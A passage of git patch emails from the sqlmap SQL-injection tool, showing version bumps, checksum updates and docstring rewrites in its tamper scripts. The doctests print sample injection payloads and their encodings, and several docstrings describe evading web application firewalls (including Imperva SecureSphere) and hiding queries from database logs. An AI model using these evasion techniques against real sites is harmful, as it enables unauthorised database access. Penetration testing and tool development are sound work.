@@ def errorThread(): while kb.threadContinue: with kb.locks.limit: try: - valueStart = time.time() threadData.shared.counter += 1 num = threadData.shared.limits.next() except StopIteration: diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 1e65f67dcfb..795443b86e7 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -312,7 +312,6 @@ def unionThread(): while kb.threadContinue: with kb.locks.limit: try: - valueStart = time.time() threadData.shared.counter += 1 num = threadData.shared.limits.next() except StopIteration: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3fc726e5da6..c7626ee4dd7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -23138239bf2e6e9a5c2e383862a6fe59 lib/core/settings.py +04a6fc212870f1d01eff7a60bbf24d64 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -89,17 +89,17 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py -09beb19c2ec9fdd14329f1c0b59a2d05 lib/techniques/blind/inference.py +0e9d37cbeabd1bbbfe2c53f01bbb6a6e lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py 48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -350d39006cf94151738a95c8d92caa28 lib/techniques/error/use.py +6007347548e85383705eaa4b863448a2 lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py -bfa5bcc4058eeb05c07f6e50f91952b6 lib/techniques/union/use.py +7361338240ecd9d01d1d10ec76bce069 lib/techniques/union/use.py 77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py From ce47b6c76e7c518dcda6982c341453aae0da32d7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 27 Jul 2018 01:39:04 +0200 Subject: [PATCH 217/428] Minor patch --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 920d6563044..8920ca854bc 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3454,7 +3454,7 @@ def maskSensitiveData(msg): retVal = retVal.replace(value, '*' * len(value)) # Just in case (for problematic parameters regarding user encoding) - for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)( -?-[a-z]|\Z)", retVal): + for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)(?= -?-[a-z]|\Z)", retVal): retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) if getpass.getuser(): diff --git a/lib/core/settings.py b/lib/core/settings.py index 29fa5237f67..33bfb190a35 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.24" +VERSION = "1.2.7.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c7626ee4dd7..41013c212a6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -14689a69e8c4447cc117703bb89489ad lib/core/common.py +af0c5caaa6328319a682073afa93ec84 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -04a6fc212870f1d01eff7a60bbf24d64 lib/core/settings.py +0444c48592419fb8a365569ea17dd2be lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py From cef416559a4d957b007ae2f74af6b610f6c348d1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 31 Jul 2018 00:20:52 +0200 Subject: [PATCH 218/428] Minor update --- lib/core/settings.py | 2 +- tamper/0x2char.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 33bfb190a35..778e93b942c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.25" +VERSION = "1.2.7.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/0x2char.py b/tamper/0x2char.py index bc3b7a433f9..50bbe8f51b3 100644 --- a/tamper/0x2char.py +++ b/tamper/0x2char.py @@ -18,6 +18,9 @@ def tamper(payload, **kwargs): """ Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart + Requirement: + * MySQL + Tested against: * MySQL 4, 5.0 and 5.5 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 41013c212a6..1ae0fd4cf14 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0444c48592419fb8a365569ea17dd2be lib/core/settings.py +08a55a677bb2cd0da088110f81cf529b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py a35b5b83c12841fdf3925190c9d24299 sqlmap.py -1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py +523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From f0e4c20004ff118a7bdf6ab79dcbcadf8c9f0c24 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 31 Jul 2018 01:17:11 +0200 Subject: [PATCH 219/428] First commit related to the #3108 --- lib/core/settings.py | 2 +- tamper/apostrophemask.py | 2 +- tamper/apostrophenullencode.py | 2 +- tamper/appendnullbyte.py | 2 +- tamper/between.py | 3 +- tamper/chardoubleencode.py | 7 +--- tamper/charencode.py | 9 ++--- tamper/charunicodeencode.py | 7 +--- tamper/charunicodeescape.py | 3 +- tamper/commalesslimit.py | 2 +- tamper/commalessmid.py | 2 +- tamper/commentbeforeparentheses.py | 2 +- tamper/concat2concatws.py | 2 +- tamper/equaltolike.py | 2 +- tamper/escapequotes.py | 2 +- tamper/halfversionedmorekeywords.py | 2 +- tamper/htmlencode.py | 2 +- tamper/informationschemacomment.py | 2 +- tamper/modsecurityversioned.py | 2 +- tamper/modsecurityzeroversioned.py | 2 +- tamper/multiplespaces.py | 2 +- tamper/nonrecursivereplacement.py | 3 +- tamper/overlongutf8.py | 5 ++- tamper/overlongutf8more.py | 5 ++- tamper/plus2concat.py | 2 +- tamper/plus2fnconcat.py | 2 +- tamper/randomcomments.py | 2 +- tamper/securesphere.py | 7 ++-- tamper/sp_password.py | 2 +- tamper/space2plus.py | 3 +- tamper/unmagicquotes.py | 3 +- txt/checksum.md5 | 62 ++++++++++++++--------------- 32 files changed, 72 insertions(+), 85 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 778e93b942c..85c54fbc2ad 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.26" +VERSION = "1.2.7.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py index f41465a30dc..cc01e3f7131 100644 --- a/tamper/apostrophemask.py +++ b/tamper/apostrophemask.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character with its UTF-8 full width counterpart + Replaces apostrophe character (') with its UTF-8 full width counterpart References: * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py index 73f4309abc5..a984d26d3cb 100644 --- a/tamper/apostrophenullencode.py +++ b/tamper/apostrophenullencode.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character with its illegal double unicode counterpart + Replaces apostrophe character (') with its illegal double unicode counterpart >>> tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271' diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py index d1c11069728..662b5785745 100644 --- a/tamper/appendnullbyte.py +++ b/tamper/appendnullbyte.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Appends encoded NULL byte character at the end of payload + Appends encoded NULL byte character (%00) at the end of payload Requirement: * Microsoft Access diff --git a/tamper/between.py b/tamper/between.py index d805523a216..827e30ee1b8 100644 --- a/tamper/between.py +++ b/tamper/between.py @@ -16,8 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' - Replaces equals operator ('=') with 'BETWEEN # AND #' + Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #' Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py index c7b51c646b8..19a50bf5c7c 100644 --- a/tamper/chardoubleencode.py +++ b/tamper/chardoubleencode.py @@ -16,13 +16,10 @@ def dependencies(): def tamper(payload, **kwargs): """ - Double url-encodes all characters in a given payload (not processing - already encoded) + Double URL-encodes all characters in a given payload (not processing already encoded) Notes: - * Useful to bypass some weak web application firewalls that do not - double url-decode the request before processing it through their - ruleset + * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset >>> tamper('SELECT FIELD FROM%20TABLE') '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' diff --git a/tamper/charencode.py b/tamper/charencode.py index ea7f4a2a476..37f5ff31c0a 100644 --- a/tamper/charencode.py +++ b/tamper/charencode.py @@ -16,8 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Url-encodes all characters in a given payload (not processing already - encoded) + URL-encodes all characters in a given payload (not processing already encoded) Tested against: * Microsoft SQL Server 2005 @@ -26,10 +25,8 @@ def tamper(payload, **kwargs): * PostgreSQL 8.3, 8.4, 9.0 Notes: - * Useful to bypass very weak web application firewalls that do not - url-decode the request before processing it through their ruleset - * The web server will anyway pass the url-decoded version behind, - hence it should work against any DBMS + * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset + * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS >>> tamper('SELECT FIELD FROM%20TABLE') '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py index b0e34aad170..0c07a31fc39 100644 --- a/tamper/charunicodeencode.py +++ b/tamper/charunicodeencode.py @@ -18,8 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Unicode-url-encodes non-encoded characters in a given payload (not - processing already encoded) + Unicode-URL-encodes all characters in a given payload (not processing already encoded) Requirement: * ASP @@ -32,9 +31,7 @@ def tamper(payload, **kwargs): * PostgreSQL 9.0.3 Notes: - * Useful to bypass weak web application firewalls that do not - unicode url-decode the request before processing it through their - ruleset + * Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset >>> tamper('SELECT FIELD%20FROM TABLE') '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' diff --git a/tamper/charunicodeescape.py b/tamper/charunicodeescape.py index 54c9b86d400..380f0736b6f 100644 --- a/tamper/charunicodeescape.py +++ b/tamper/charunicodeescape.py @@ -13,8 +13,7 @@ def tamper(payload, **kwargs): """ - Unicode-escapes non-encoded characters in a given payload (not - processing already encoded) + Unicode-escapes non-encoded characters in a given payload (not processing already encoded) Notes: * Useful to bypass weak filtering and/or WAFs in JSON contexes diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py index 4b62246de1b..bf5d1325eed 100644 --- a/tamper/commalesslimit.py +++ b/tamper/commalesslimit.py @@ -19,7 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' + Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart Requirement: * MySQL diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py index 395bd03d55b..42b004b889d 100644 --- a/tamper/commalessmid.py +++ b/tamper/commalessmid.py @@ -19,7 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' + Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart Requirement: * MySQL diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py index 17525286e2f..2d998b81991 100644 --- a/tamper/commentbeforeparentheses.py +++ b/tamper/commentbeforeparentheses.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Prepends (inline) comment before parentheses + Prepends (inline) comment before parentheses (e.g. ( -> /**/() Tested against: * Microsoft SQL Server diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py index 58ff490e987..4285eaab0ec 100644 --- a/tamper/concat2concatws.py +++ b/tamper/concat2concatws.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' + Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart Requirement: * MySQL diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py index 0a59962e4d1..b0a7c8977e0 100644 --- a/tamper/equaltolike.py +++ b/tamper/equaltolike.py @@ -19,7 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces all occurrences of operator equal ('=') with operator 'LIKE' + Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py index f6f39ecc688..3ebcd466a58 100644 --- a/tamper/escapequotes.py +++ b/tamper/escapequotes.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Slash escape quotes (' and ") + Slash escape single and double quotes (e.g. ' -> \') >>> tamper('1" AND SLEEP(5)#') '1\\\\" AND SLEEP(5)#' diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py index d42aafee89c..6c3f0bfc10e 100644 --- a/tamper/halfversionedmorekeywords.py +++ b/tamper/halfversionedmorekeywords.py @@ -21,7 +21,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds versioned MySQL comment before each keyword + Adds (MySQL) versioned comment before each keyword Requirement: * MySQL < 5.1 diff --git a/tamper/htmlencode.py b/tamper/htmlencode.py index 78c244ceea7..eadf3225d16 100644 --- a/tamper/htmlencode.py +++ b/tamper/htmlencode.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - HTML encode (using code points) all non-alphanumeric characters + HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ') >>> tamper("1' AND SLEEP(5)#") '1' AND SLEEP(5)#' diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py index 57c3f5460dc..63a2d9aa269 100644 --- a/tamper/informationschemacomment.py +++ b/tamper/informationschemacomment.py @@ -13,7 +13,7 @@ def tamper(payload, **kwargs): """ - Add a comment to the end of all occurrences of (blacklisted) "information_schema" identifier + Add a comment to the end of all occurrences of (MySQL) "information_schema" identifier >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES') 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py index e287d25a2c8..0f8435598f6 100644 --- a/tamper/modsecurityversioned.py +++ b/tamper/modsecurityversioned.py @@ -19,7 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Embraces complete query with versioned comment + Embraces complete query with (MySQL) versioned comment Requirement: * MySQL diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py index a3d24a55446..cb54fc8ff47 100644 --- a/tamper/modsecurityzeroversioned.py +++ b/tamper/modsecurityzeroversioned.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Embraces complete query with zero-versioned comment + Embraces complete query with (MySQL) zero-versioned comment Requirement: * MySQL diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py index 40a2b033c06..f5b8e904b61 100644 --- a/tamper/multiplespaces.py +++ b/tamper/multiplespaces.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds multiple spaces around SQL keywords + Adds multiple spaces (' ') around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py index dbfe2ca2b12..a0a7d04b0d2 100644 --- a/tamper/nonrecursivereplacement.py +++ b/tamper/nonrecursivereplacement.py @@ -15,8 +15,7 @@ def tamper(payload, **kwargs): """ - Replaces predefined SQL keywords with representations - suitable for replacement (e.g. .replace("SELECT", "")) filters + Replaces predefined SQL keywords with representations suitable for replacement filters (e.g. SELECT -> SELSELECTECT) Notes: * Useful to bypass very weak custom filters diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py index 70d5ff76b40..c5321317477 100644 --- a/tamper/overlongutf8.py +++ b/tamper/overlongutf8.py @@ -18,8 +18,9 @@ def tamper(payload, **kwargs): """ Converts all (non-alphanum) characters in a given payload (not processing already encoded) - Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ - Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ + Reference: + * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') 'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1' diff --git a/tamper/overlongutf8more.py b/tamper/overlongutf8more.py index 3d8a8753c64..2a9ee4c14d4 100644 --- a/tamper/overlongutf8more.py +++ b/tamper/overlongutf8more.py @@ -18,8 +18,9 @@ def tamper(payload, **kwargs): """ Converts all characters in a given payload (not processing already encoded) - Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ - Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ + Reference: + * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1' diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py index 5945797c045..fa238ae9179 100644 --- a/tamper/plus2concat.py +++ b/tamper/plus2concat.py @@ -20,7 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces plus ('+') character with function CONCAT() + Replaces plus operator ('+') with (MsSQL) function CONCAT() Tested against: * Microsoft SQL Server 2012 diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py index 27cbbea207f..273dd6462a0 100644 --- a/tamper/plus2fnconcat.py +++ b/tamper/plus2fnconcat.py @@ -20,7 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces plus ('+') character with ODBC function {fn CONCAT()} + Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} Tested against: * Microsoft SQL Server 2008 diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py index d568ff10681..7004134231a 100644 --- a/tamper/randomcomments.py +++ b/tamper/randomcomments.py @@ -15,7 +15,7 @@ def tamper(payload, **kwargs): """ - Add random comments to SQL keywords + Add random inline comments inside SQL keywords >>> import random >>> random.seed(0) diff --git a/tamper/securesphere.py b/tamper/securesphere.py index 3d1a4047ec1..998a69e2cc0 100644 --- a/tamper/securesphere.py +++ b/tamper/securesphere.py @@ -14,11 +14,10 @@ def dependencies(): def tamper(payload, **kwargs): """ - Appends special crafted string + Appends special crafted string for bypassing Imperva SecureSphere WAF - Notes: - * Useful for bypassing Imperva SecureSphere WAF - * Reference: http://seclists.org/fulldisclosure/2011/May/163 + Reference: + * http://seclists.org/fulldisclosure/2011/May/163 >>> tamper('1 AND 1=1') "1 AND 1=1 and '0having'='0having'" diff --git a/tamper/sp_password.py b/tamper/sp_password.py index 9ea759018a9..540d3647a5e 100644 --- a/tamper/sp_password.py +++ b/tamper/sp_password.py @@ -11,7 +11,7 @@ def tamper(payload, **kwargs): """ - Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs + Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs Requirement: * MSSQL diff --git a/tamper/space2plus.py b/tamper/space2plus.py index 1fa867490aa..d8ef65efdaf 100644 --- a/tamper/space2plus.py +++ b/tamper/space2plus.py @@ -17,8 +17,7 @@ def tamper(payload, **kwargs): Replaces space character (' ') with plus ('+') Notes: - * Is this any useful? The plus get's url-encoded by sqlmap engine - invalidating the query afterwards + * Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases >>> tamper('SELECT id FROM users') diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py index f26d0ac04bb..b6419e74d85 100644 --- a/tamper/unmagicquotes.py +++ b/tamper/unmagicquotes.py @@ -16,8 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces quote character (') with a multi-byte combo %bf%27 together with - generic comment at the end (to make it work) + Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work) Notes: * Useful for bypassing magic_quotes/addslashes feature diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1ae0fd4cf14..27f9d2297b4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -08a55a677bb2cd0da088110f81cf529b lib/core/settings.py +ec2adffae2982c11332c573fe4e68d6d lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -228,43 +228,43 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py a35b5b83c12841fdf3925190c9d24299 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py -4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py -4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py -d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py +4e6956958ef8135cd543d7a57f2e73ff tamper/apostrophemask.py +7c838eadd96b20800ba0bd394f5014f0 tamper/apostrophenullencode.py +0d7e8a3a0e17c92d51c49415884a47c9 tamper/appendnullbyte.py 0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py -9a3da4aa7b220448aa3ecbb92f68330f tamper/between.py +e77a89b2af931a1820f6ba4b86d19cd4 tamper/between.py e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py -e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py -3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py -b502023ac6c48e49e652ba524b8e18cc tamper/charunicodeencode.py -2c2b38974dc773568de7e7d771d7042c tamper/charunicodeescape.py -6a395de07b60f47d9474ace0a98c160f tamper/commalesslimit.py -211bb8fa36a6ecb42b719c951c362851 tamper/commalessmid.py -6082358eb328d1cdd4587e73c95bbefc tamper/commentbeforeparentheses.py -334e4a2485b3a1bbc1734823b93ea694 tamper/concat2concatws.py -dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py -06df880df5d8749963f5562f60fd1637 tamper/escapequotes.py +1807417f8a7fc0bb30c36ead458da0c8 tamper/chardoubleencode.py +043c97c7b214335838a6bb15eeedcba3 tamper/charencode.py +0c0d0e5d0caf4258a75112ab59fa3e75 tamper/charunicodeencode.py +18b2ca09390686f895c3bbd6460ac034 tamper/charunicodeescape.py +6c618b9310ed5c8de93c927e920b1d31 tamper/commalesslimit.py +50f6532870d2e109bf46468e8d3ded49 tamper/commalessmid.py +4951fec0a1af043e4b9c0728882d3452 tamper/commentbeforeparentheses.py +376dc1203bfcd88380d902d36e7e0c5a tamper/concat2concatws.py +6c882baf74213f401841968c04ce5e42 tamper/equaltolike.py +22ab48f5b8ca449ac651637016be4369 tamper/escapequotes.py 4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py -25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py -9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py +6124bc647bfa04f2b16ff8cad98382d4 tamper/halfversionedmorekeywords.py +ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py 3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py -21665e68ef9f91b2395e81d2f341412d tamper/informationschemacomment.py +4615cbeff722583e7ab3dbe774e38c93 tamper/informationschemacomment.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py 1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py -de4c83d33968a0cbf00cdfd8d35deddc tamper/modsecurityversioned.py -39981d5d6cb84aca950458739102bb07 tamper/modsecurityzeroversioned.py -5ee5147612ebe4769a67a8e2305d62f7 tamper/multiplespaces.py -be757e4c9a6fb36af7b9a8c444fddb05 